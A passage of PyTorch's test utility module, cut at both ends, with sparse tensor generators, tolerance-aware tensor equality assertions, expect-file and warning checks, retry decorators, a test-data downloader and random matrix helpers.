# perfectly fit.
M = (n_cols - m) * (n_cols - m + 1) // 2
K = (n_rows - n) % (n_cols - m + 1)
return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
# Different from the original method description, here counts
# has leading 0 required by crow_indices:
counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
n = m = 0
N = sawteeth(n, m)
if N and nnz >= max(N, n_cols):
# determine the width of the sawteeth window. We use bisection to solve
# N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
# for n
n_left = n
n_right = n_rows - 1
N_right = sawteeth(n_right, m)
while n_right - n_left > 1:
n_middle = (n_left + n_right) // 2
N_middle = sawteeth(n_middle, m)
if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
n_right, N_right = n_middle, N_middle
else:
n_left = n_middle
n, N = n_right, N_right
# fill the right rectangle with counts:
assert n
counts[-n:].fill_(n_cols)
if N and nnz - n * n_cols >= max(N, n_rows - n):
# determine the height of the sawteeth window. We use bisection to solve
# N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
# for m.
m_left = m
m_right = n_cols - 1
N_right = sawteeth(n, m_right)
while m_right - m_left > 1:
m_middle = (m_left + m_right) // 2
N_middle = sawteeth(n, m_middle)
if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
m_right, N_right = m_middle, N_middle
else:
m_left = m_middle
m, N = m_right, N_right
# fill the bottom rectangle with counts:
assert m
counts[1:n_rows - n + 1].fill_(m)
if N:
# fill the sawteeth window with counts
q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
(n_cols - m) * (n_cols - m + 1) // 2)
p = 1 + q * (n_cols - m + 1)
if sys.version_info >= (3, 8):
k = math.isqrt(2 * r)
else:
# math.isqrt(x) is available starting from Python 3.8.
# Here we use int(math.sqrt(x)) as an approximation
                # that appears to give the exact result for all x values
# less than 2**35, at least, the upper limit of x is
# TBD.
k = int(math.sqrt(2 * r))
if k * (k + 1) > 2 * r:
k -= 1
corr = r - k * (k + 1) // 2
assert not ((p > 1) and (m > 0)) # full sawteeth are never on top of a bottom rectangle
# sequence of full sawteeth:
counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
# incomplete sawtooth:
counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
else:
# given input does not support sawteeth
p = 1
corr = nnz - n * n_cols - m * (n_rows - n)
# correction that will guarantee counts.sum() == nnz:
counts[p] += corr
if random:
# randomize crow_indices by shuffling the sawteeth
# sequence:
perm = torch.randperm(n_rows, device=counts.device)
counts[1:] = counts[1:][perm]
# compute crow_indices:
crow_indices = counts
crow_indices.cumsum_(dim=0)
return crow_indices.to(device=device)
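    # Small worked example (added for clarity; the exact counts produced by the
    # sampling above depend on n_rows/n_cols/nnz): crow_indices is the cumulative
    # sum of a leading-zero counts vector. For counts == [0, 2, 0, 1] (rows with
    # 2, 0 and 1 specified elements, so nnz == 3), the cumsum gives
    # crow_indices == [0, 2, 2, 3], and crow_indices[-1] == nnz.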
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
sparse_dim = 2
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
assert len(size) == sparse_dim
def random_sparse_csr(n_rows, n_cols, nnz):
crow_indices = self._make_crow_indices(n_rows, n_cols, nnz, device=device, dtype=index_dtype)
col_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_rows):
count = crow_indices[i + 1] - crow_indices[i]
col_indices[crow_indices[i]:crow_indices[i + 1]], _ = torch.sort(
torch.randperm(n_cols, dtype=index_dtype, device=device)[:count])
values = make_tensor([nnz], device=device, dtype=dtype, low=-1, high=1)
return values, crow_indices, col_indices
values, crow_indices, col_indices = random_sparse_csr(size[0], size[1], nnz)
return torch.sparse_csr_tensor(crow_indices,
col_indices,
values, size=size, dtype=dtype, device=device)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
return t.coalesce().to_dense()
# Compares torch function with reference function for given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
n_inp, n_args, n_kwargs = sample_input.numpy()
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
rtol = cast(float, rtol)
atol = cast(float, atol)
assert atol is not None
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
return _compare_scalars_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
    # Construct assert messages based on the internal debug message and the user-provided message.
def _get_assert_msg(self, msg, debug_msg=None):
if msg is None:
return debug_msg
else:
return f"\n{msg}" if debug_msg is None else f"{debug_msg}\n{msg}"
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means test is written wrongly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def _is_dict(self, obj):
return isinstance(obj, (dict, torch._C.ScriptDict)) # type: ignore[attr-defined]
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified, then the other must be too"
debug_msg: Optional[str] = None
# Tensor x Number and Number x Tensor comparisons
if isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
debug_msg = ("Attempted to compare with different is_sparse settings: "
f"Expected: {x.is_sparse}; Actual: {y.is_sparse}.")
super().assertEqual(x.is_sparse, y.is_sparse, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
debug_msg = ("Attempted to compare with different is_quantized settings: "
f"Expected: {x.is_quantized}; Actual: {y.is_quantized}.")
super().assertEqual(x.is_quantized, y.is_quantized, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
if x.is_sparse:
if x.size() != y.size():
debug_msg_sparse = ("Attempted to compare equality of tensors with different sizes: "
f"Expected: {x.size()}; Actual: {y.size()}.")
super().assertTrue(False, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg_sparse))
x = x.coalesce()
y = y.coalesce()
indices_result, debug_msg_indices = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result:
assert debug_msg_indices is not None
debug_msg = "Sparse tensor indices failed to compare as equal! " + debug_msg_indices
super().assertTrue(indices_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
values_result, debug_msg_values = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result:
assert debug_msg_values is not None
debug_msg = "Sparse tensor values failed to compare as equal! " + debug_msg_values
super().assertTrue(values_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg_compare = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_compare is not None
debug_msg = "Quantized representations failed to compare as equal! " + debug_msg_compare
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
result, debug_msg_generic = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_generic is not None
debug_msg = "Tensors failed to compare as equal!" + debug_msg_generic
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif isinstance(x, (np.ndarray, torch.Tensor)) or isinstance(y, (np.ndarray, torch.Tensor)):
def maybe_to_tensor(a: Union[np.ndarray, torch.Tensor]) -> Union[np.ndarray, torch.Tensor]:
if not isinstance(a, np.ndarray):
return a
try:
return torch.from_numpy(a)
except TypeError:
# This happens if the dtype is non-numeric or not supported by torch
return a
def maybe_to_list(a: Any) -> Any:
if not isinstance(a, (np.ndarray, torch.Tensor)):
return a
return a.tolist()
x = maybe_to_tensor(x)
y = maybe_to_tensor(y)
if isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
self.assertEqual(
x, y, atol=atol, rtol=rtol, msg=msg, exact_dtype=exact_dtype, exact_device=exact_device
)
else:
# In case we can't convert the array to a tensor, we fall back to comparing x and y as iterables
self.assertEqual(
maybe_to_list(x),
maybe_to_list(y),
atol=atol,
rtol=rtol,
msg=msg,
exact_dtype=exact_dtype,
exact_device=exact_device
)
elif isinstance(x, string_classes) and isinstance(y, string_classes):
debug_msg = ("Attempted to compare [string] types: "
f"Expected: {repr(x)}; Actual: {repr(y)}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif type(x) == set and type(y) == set:
debug_msg = ("Attempted to compare [set] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif self._is_dict(x) and self._is_dict(y):
if isinstance(x, OrderedDict) and isinstance(y, OrderedDict):
self.assertEqual(x.items(), y.items(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
else:
self.assertEqual(set(x.keys()), set(y.keys()), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
key_list = list(x.keys())
self.assertEqual([x[k] for k in key_list],
[y[k] for k in key_list],
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, type) and isinstance(y, type):
# See TestTorch.test_assert_equal_generic_meta
debug_msg = ("Attempted to compare [type] types: "
f"Expected: {x}; Actual: {y}.")
super().assertEqual(x, y, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif is_iterable(x) and is_iterable(y):
debug_msg = ("Attempted to compare the lengths of [iterable] types: "
f"Expected: {len(x)}; Actual: {len(y)}.")
super().assertEqual(len(x), len(y), msg=self._get_assert_msg(msg, debug_msg=debug_msg))
for x_, y_ in zip(x, y):
self.assertEqual(x_, y_, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(x, bool) and isinstance(y, bool):
super().assertTrue(x == y, msg=msg)
# Scalar x Scalar
elif isinstance(x, Number) and isinstance(y, Number):
result, debug_msg_scalars = self._compareScalars(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan)
if not result:
assert debug_msg_scalars is not None
debug_msg = "Scalars failed to compare as equal! " + debug_msg_scalars
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
super().assertEqual(x, y, msg=msg)
def assertNotEqual(self, x, y, msg: Optional[str] = None, *, # type: ignore[override]
atol: Optional[float] = None, rtol: Optional[float] = None, **kwargs) -> None:
with self.assertRaises(AssertionError, msg=msg):
self.assertEqual(x, y, msg, atol=atol, rtol=rtol, **kwargs)
def assertEqualTypeString(self, x, y) -> None:
        # This API is used to simulate the deprecated x.type() == y.type()
self.assertEqual(x.device, y.device)
self.assertEqual(x.dtype, y.dtype)
self.assertEqual(x.is_sparse, y.is_sparse)
def assertObjectIn(self, obj: Any, iterable: Iterable[Any]) -> None:
for elem in iterable:
if id(obj) == id(elem):
return
raise AssertionError("object not found in iterable")
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaises(self, expected_exception, *args, **kwargs):
if self._ignore_not_implemented_error:
context: Optional[AssertRaisesContextIgnoreNotImplementedError] = \
AssertRaisesContextIgnoreNotImplementedError(expected_exception, self) # type: ignore[call-arg]
try:
return context.handle('assertRaises', args, kwargs) # type: ignore[union-attr]
finally:
# see https://bugs.python.org/issue23890
context = None
else:
return super().assertRaises(expected_exception, *args, **kwargs)
# Reimplemented to provide special behavior when
# _ignore_not_implemented_error is True
def assertRaisesRegex(self, expected_exception, expected_regex, *args, **kwargs):
if self._ignore_not_implemented_error:
context = AssertRaisesContextIgnoreNotImplementedError( # type: ignore[call-arg]
expected_exception, self, expected_regex)
return context.handle('assertRaisesRegex', args, kwargs) # type: ignore[attr-defined]
else:
return super().assertRaisesRegex(expected_exception, expected_regex, *args, **kwargs)
# TODO: Support context manager interface
# NB: The kwargs forwarding to callable robs the 'subname' parameter.
# If you need it, manually apply your callable in a lambda instead.
def assertExpectedRaises(self, exc_type, callable, *args, **kwargs):
subname = None
if 'subname' in kwargs:
subname = kwargs['subname']
del kwargs['subname']
try:
callable(*args, **kwargs)
except exc_type as e:
self.assertExpected(str(e), subname)
return
# Don't put this in the try block; the AssertionError will catch it
self.fail(msg="Did not raise when expected to")
def assertNotWarn(self, callable, msg=''):
r"""
Test if :attr:`callable` does not raise a warning.
"""
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
callable()
self.assertTrue(len(ws) == 0, msg)
@contextmanager
def assertWarnsOnceRegex(self, category, regex=''):
"""Context manager for code that *must always* warn
This filters expected warnings from the test and fails if
the expected warning is not caught. It uses set_warn_always() to force
TORCH_WARN_ONCE to behave like TORCH_WARN
"""
pattern = re.compile(regex)
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always") # allow any warning to be raised
with set_warn_always_context(True):
yield
if len(ws) == 0:
self.fail('no warning caught')
self.assertTrue(any([type(w.message) is category for w in ws]))
self.assertTrue(
any([re.match(pattern, str(w.message)) for w in ws]),
f'{pattern}, {[w.message for w in ws if type(w.message) is category]}')
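    # Illustrative usage sketch (hypothetical callable): the block must emit at
    # least one warning of the given category, and one of the caught messages must
    # match the regex, even when the underlying code uses TORCH_WARN_ONCE.
    #
    #     with self.assertWarnsOnceRegex(UserWarning, "deprecated"):
    #         call_something_that_warns()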
def assertExpected(self, s, subname=None):
r"""
Test that a string matches the recorded contents of a file
derived from the name of this test and subname. This file
is placed in the 'expect' directory in the same directory
as the test script. You can automatically update the recorded test
output using --accept.
If you call this multiple times in a single function, you must
give a unique subname each time.
"""
if not isinstance(s, str):
raise TypeError("assertExpected is strings only")
def remove_prefix(text, prefix):
if text.startswith(prefix):
return text[len(prefix):]
return text
# NB: we take __file__ from the module that defined the test
# class, so we place the expect directory where the test script
# lives, NOT where test/common_utils.py lives. This doesn't matter in
# PyTorch where all test scripts are in the same directory as
# test/common_utils.py, but it matters in onnx-pytorch
module_id = self.__class__.__module__
munged_id = remove_prefix(self.id(), module_id + ".")
test_file = os.path.realpath(sys.modules[module_id].__file__)
expected_file = os.path.join(os.path.dirname(test_file),
"expect",
munged_id)
subname_output = ""
if subname:
expected_file += "-" + subname
subname_output = " ({})".format(subname)
expected_file += ".expect"
expected = None
def accept_output(update_type):
print("Accepting {} for {}{}:\n\n{}".format(update_type, munged_id, subname_output, s))
with open(expected_file, 'w') as f:
# Adjust for producer_version, leave s unmodified
s_tag = re.sub(r'(producer_version): "[0-9.]*"',
r'\1producer_version: "CURRENT_VERSION"', s)
f.write(s_tag)
try:
with open(expected_file) as f:
expected = f.read()
except IOError as e:
if e.errno != errno.ENOENT:
raise
elif expecttest.ACCEPT:
return accept_output("output")
else:
raise RuntimeError(
("I got this output for {}{}:\n\n{}\n\n"
"No expect file exists; to accept the current output, run:\n"
"python {} {} --accept").format(munged_id, subname_output, s, __main__.__file__, munged_id)) from None
# a hack for JIT tests
if IS_WINDOWS:
expected = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', expected)
s = re.sub(r'CppOp\[(.+?)\]', 'CppOp[]', s)
# Adjust for producer_version
expected = expected.replace(
'producer_version: "CURRENT_VERSION"',
'producer_version: "{}"'.format(torch.onnx.producer_version)
)
if expecttest.ACCEPT:
if expected != s:
return accept_output("updated output")
else:
if hasattr(self, "assertMultiLineEqual"):
# Python 2.7 only
# NB: Python considers lhs "old" and rhs "new".
self.assertMultiLineEqual(expected, s)
else:
self.assertEqual(s, expected)
def assertExpectedStripMangled(self, s, subname=None):
s = re.sub(r'__torch__[^ ]+', '', s)
self.assertExpected(s, subname)
def assertGreaterAlmostEqual(self, first, second, places=None, msg=None, delta=None):
"""Assert that ``first`` is greater than or almost equal to ``second``.
The equality of ``first`` and ``second`` is determined in a similar way to
the ``assertAlmostEqual`` function of the standard library.
"""
if delta is not None and places is not None:
raise TypeError("specify delta or places not both")
if first >= second:
return
diff = second - first
if delta is not None:
if diff <= delta:
return
standardMsg = f"{first} not greater than or equal to {second} within {delta} delta"
else:
if places is None:
places = 7
if round(diff, places) == 0:
return
standardMsg = f"{first} not greater than or equal to {second} within {places} places"
msg = self._formatMessage(msg, standardMsg)
raise self.failureException(msg)
# run code in subprocess and capture exceptions.
@staticmethod
def run_process_no_exception(code, env=None):
import subprocess
popen = subprocess.Popen(
[sys.executable, '-c', code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env)
(stdout, stderr) = popen.communicate()
return (stdout, stderr)
# returns captured stderr
@staticmethod
def runWithPytorchAPIUsageStderr(code):
env = os.environ.copy()
env["PYTORCH_API_USAGE_STDERR"] = "1"
# remove IN_CI flag since this is a wrapped test process.
# IN_CI flag should be set in the parent process only.
if "IN_CI" in env.keys():
del env["IN_CI"]
(stdout, stderr) = TestCase.run_process_no_exception(code, env=env)
return stderr.decode('ascii')
def download_file(url, binary=True):
from urllib.parse import urlsplit
from urllib import request, error
filename = os.path.basename(urlsplit(url)[2])
data_dir = get_writable_path(os.path.join(os.path.dirname(__file__), 'data'))
path = os.path.join(data_dir, filename)
if os.path.exists(path):
return path
try:
data = request.urlopen(url, timeout=15).read()
with open(path, 'wb' if binary else 'w') as f:
f.write(data)
return path
except error.URLError as e:
msg = "could not download test file '{}'".format(url)
warnings.warn(msg, RuntimeWarning)
raise unittest.SkipTest(msg) from e
def find_free_port():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('localhost', 0))
_, port = sock.getsockname()
return port
# Errors that we can get in c10d initialization for which we should retry tests for.
ADDRESS_IN_USE = "Address already in use"
CONNECT_TIMEOUT = "connect() timed out."
def retry_on_connect_failures(func=None, connect_errors=(ADDRESS_IN_USE)):
"""Reruns a test if the test returns a RuntimeError and the exception
matches exactly with one of the strings in connect_errors."""
# This if block is executed when using this function as a decorator with arguments.
if func is None:
return partial(retry_on_connect_failures, connect_errors=connect_errors)
@wraps(func)
def wrapper(*args, **kwargs):
tries_remaining = 10
while True:
try:
return func(*args, **kwargs)
except RuntimeError as error:
if str(error) in connect_errors:
tries_remaining -= 1
if tries_remaining == 0:
raise
time.sleep(random.random())
continue
raise
return wrapper
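# Illustrative usage sketch (hypothetical test): the decorator can be applied bare
# or with an explicit connect_errors argument; the wrapped test is retried (up to
# 10 attempts, with a short random sleep) when a matching RuntimeError is raised.
#
#     @retry_on_connect_failures
#     def test_init_rpc(self):
#         ...  # may raise RuntimeError("Address already in use") transiently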
# Decorator to retry upon certain Exceptions.
def retry(ExceptionToCheck, tries=3, delay=3, skip_after_retries=False):
def deco_retry(f):
@wraps(f)
def f_retry(*args, **kwargs):
mtries, mdelay = tries, delay
while mtries > 1:
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
msg = "%s, Retrying in %d seconds..." % (str(e), mdelay)
print(msg)
time.sleep(mdelay)
mtries -= 1
try:
return f(*args, **kwargs)
except ExceptionToCheck as e:
raise unittest.SkipTest(f"Skipping after {tries} consecutive {str(e)}") from e if skip_after_retries else e
return f_retry # true decorator
return deco_retry
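# Illustrative usage sketch (hypothetical function and exception type): retry the
# body up to `tries` times with `delay` seconds between attempts; with
# skip_after_retries=True the final failure becomes a SkipTest instead of an error.
#
#     @retry(ConnectionError, tries=3, delay=1)
#     def fetch_fixture(self):
#         ...  # flaky network access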
# Methods for matrix generation
def random_square_matrix_of_rank(l, rank, dtype=torch.double, device='cpu'):
assert rank <= l
A = torch.randn(l, l, dtype=dtype, device=device)
u, s, vh = torch.linalg.svd(A, full_matrices=False)
for i in range(l):
if i >= rank:
s[i] = 0
elif s[i] == 0:
s[i] = 1
return (u * s.to(dtype).unsqueeze(-2)) @ vh
def random_well_conditioned_matrix(*shape, dtype, device, mean=1.0, sigma=0.001):
"""
Returns a random rectangular matrix (batch of matrices)
with singular values sampled from a Gaussian with
mean `mean` and standard deviation `sigma`.
The smaller the `sigma`, the better conditioned
the output matrix is.
"""
primitive_dtype = {
torch.float: torch.float,
torch.double: torch.double,
torch.cfloat: torch.float,
torch.cdouble: torch.double
}
x = torch.rand(shape, dtype=dtype, device=device)
m = x.size(-2)
n = x.size(-1)
u, _, vh = torch.linalg.svd(x, full_matrices=False)
s = (torch.randn(*(shape[:-2] + (min(m, n),)), dtype=primitive_dtype[dtype], device=device) * sigma + mean) \
.sort(-1, descending=True).values.to(dtype)
return (u * s.unsqueeze(-2)) @ vh
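# Editor's illustrative sketch (not part of the original module): e.g. a 2 x 5 x 3 batch
# of well-conditioned matrices for least-squares style tests:
#     a = random_well_conditioned_matrix(2, 5, 3, dtype=torch.double, device='cpu')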
# TODO: remove this (prefer make_symmetric_matrices below)
def random_symmetric_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.transpose(-2, -1)).div_(2)
return A
# Creates a symmetric matrix or batch of symmetric matrices
# Shape must be a square matrix or batch of square matrices
def make_symmetric_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
    t = (t + t.transpose(-2, -1)).div_(2)
return t
def random_hermitian_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
A = (A + A.transpose(-2, -1).conj()).div_(2)
return A
def random_symmetric_psd_matrix(l, *batches, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batches + (l, l)), dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1))
def random_hermitian_psd_matrix(matrix_size, *batch_dims, dtype=torch.double, device='cpu'):
"""
